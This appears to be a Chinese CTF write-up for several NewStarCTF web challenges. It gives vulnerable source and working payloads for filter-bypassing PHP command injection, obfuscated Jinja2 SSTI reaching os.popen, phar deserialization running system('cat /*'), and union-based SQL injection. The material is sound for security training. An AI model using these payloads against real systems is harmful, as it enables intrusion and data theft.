Web题
RCE
源码:
<?php
error_reporting(0);
if(isset($_GET["cmd"])){
if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
echo "Don't Hack Me";
}else{
system($_GET["cmd"]);
}
}else{
show_source(__FILE__);
}
payload:
cmd=cd%09..%26%26cd%09..%26%26cd%09..%26%26c$2at%09ffff?lllaaaaggggg
BabySSTI_Two
源码:
from flask import Flask, request
from jinja2 import Template
import re
app = Flask(__name__)
@app.route("/")
def index():
name = request.args.get('name', 'CTFer')
if not re.findall('class|init|mro|subclasses|flag|cat|env|"|eval|system|popen|globals|builtins|\+| |attr|\~', name):
t = Template("<body bgcolor=#6B6882><br><p><b><font color='white' size=6px><center>Welcome to NewStarCTF Again, Dear " + name + "</font></center></b></p><br><hr><br><font color='white' size=6px><center>Try to GET me a NAME</center></font><!--This is Hint: Waf Has Been Updated, More Safe!--></body>")
return t.render()
else:
t = Template("Get Out!Hacker!")
return t.render()
if __name__ == "__main__":
app.run()
payload:
?name={{[]['\x5f\x5fc\x6cass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubc\x6casses\x5f\x5f']()[199]['\x5f\x5f\x69nit\x5f\x5f']['\x5f\x5fg\x6cobals\x5f\x5f']['\x5f\x5fbu\x69ltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['p\x6fpen']('tac%09/f*').read()}}
UnserializeThree
文件上传+phar反序列化
源码:
class.php
<?php
highlight_file(__FILE__);
class Evil{
public $cmd;
public function __destruct()
{
if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
//Same point ,can you bypass me again?
eval("#".$this->cmd);
}else{
echo "No!";
}
}
}
file_exists($_GET['file']);
payload:
phar.php => phar.png
class Evil{
public $cmd;
public function __construct($cmd)
{
$this->cmd = $cmd;
}
}
$phar = new Phar("phar.phar");//生成后缀名为phar的文件,后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$cmd = urldecode("%0D")."system('cat /*');";
$o = new Evil($cmd);
$phar->setMetadata($o);//将自定义的meta-data存入mainfest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
$phar->stopBuffering();
rename("phar.phar","phar1.png");
触发:
/class.php?file=phar://upload/20d230fcef0fa22a2f771da029c4b9fc.png
又一个SQL
绕过空格:%0b
payload:
#爆表名
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(table_name)%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()),2;
#爆列名
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(column_name)%0bfrom%0binformation_schema.columns%0bwhere%0btable_name='wfy_comments'),2;
# 爆字段
-1%0bunion%0bselect%0b(select%0bgroup_concat(id,text,user,name,display)%0bfrom%0bwfy_comments%0blimit%0b0,1),2;
Rome
简单的反序列化题,用ysoseiral
生成下payload就能打
源码(用jadx反编译的):
package remo.remo;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
@Controller
/* loaded from: Remo-0.0.1-SNAPSHOT.jar:BOOT-INF/classes/remo/remo/SerController.class */
public class SerController {
@GetMapping({"/"})
@ResponseBody
public String helloCTF() {
return "Do you like Jvav?";
}
@PostMapping({"/"})
@ResponseBody
public String helloCTF(@RequestParam String EXP) throws IOException, ClassNotFoundException {
if (EXP.equals("")) {
return "Do you know Rome Serializer?";
}
byte[] exp = Base64.getDecoder().decode(EXP);
ByteArrayInputStream bytes = new ByteArrayInputStream(exp);
ObjectInputStream objectInputStream = new ObjectInputStream(bytes);
objectInputStream.readObject();
return "Do You like Jvav?";
}
}
payload注意用url编码将base64编码后的特殊字符编码